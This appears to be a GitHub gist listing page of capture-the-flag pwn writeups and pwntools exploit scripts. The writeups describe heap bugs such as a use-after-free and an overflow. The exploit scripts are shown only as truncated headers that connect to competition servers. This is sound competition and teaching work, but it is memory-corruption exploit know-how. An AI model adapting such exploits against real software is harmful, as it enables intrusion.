Skip to content

Instantly share code, notes, and snippets.

romanking98

Block or report user

Report or block romanking98

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View 1_stringer_writeup.md

Stringer (18 solves)

Challenge from RCTF, prequals to XCTF.

Bugs

There are 2 bugs in the program : the first is an obvious UAF. The second is no NULL termination immediately after our input, allowing us to leak. NULL byte terminates at buf + size - 1, read loop breaks if buf == "\n"

However, leaking is tricky since program uses calloc, which sets the newly allocated heap chunk to 0x00.

View gogogadget_writeup.md

GoGoGadget (1 solve)

Tool credits : @scwuaptx, pwngdb for making public awesome malloc research

Layout

*------------------------------*
          Hi Inspector!
View null_writeup.md

NULL ( 17-18 solves)

Challenge makes a thread to do the job. So , a thread_arena is created on a new mmap_segment.

Bug

Overflow in read function :

 for ( i = 0LL; ; i += v3 )
  {
View exploit_sapeloshop.py
#!/usr/bin/python
from pwn import *
elf = ELF("./libc-2.23.so")
#r = remote("http://sapeloshop.teaser.insomnihack.ch",80)
r = remote('sapeloshop.teaser.insomnihack.ch', 80)
#r = process("./sapeloshop",env={"LD_PRELOAD":"./libc-2.23.so"})
raw_input()
i = int("3d714", 16)
View exploit_readme.py
#!/usr/bin/python
from pwn import *
p = remote("35.198.130.245", 1337)
#p = process("./readme_revenge")
raw_input()
#name = "A"*920
name = p64(0x00) # Pass NULL Check.
name += "XXXX"
View exploit_memo.py
#!/usr/bin/python
from pwn import *
elf = ELF("./libc-2.23.so")
p = remote("159.203.116.12", 8888)
#p = process("./memo",env={"LD_PRELOAD":"./libc-2.23.so"})
raw_input()
def menu():
p.recvuntil(">")
View exploit_left.py
#!/usr/bin/python
from pwn import *
rol1 = lambda val, r_bits, max_bits: \
(val << r_bits%max_bits) & (2**max_bits-1) | \
((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))
ror1 = lambda val, r_bits, max_bits: \
((val & (2**max_bits-1)) >> r_bits%max_bits) | \
(val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
View exploit_secure.py
#!/usr/bin/python
from pwn import *
p = remote("secure_keymanager.pwn.seccon.jp",47225)
#p = process("./secure_keymanager",env={"LD_PRELOAD" : "./libc-2.23.so"})
raw_input()
def menu():
p.recvuntil(">>")
You can’t perform that action at this time.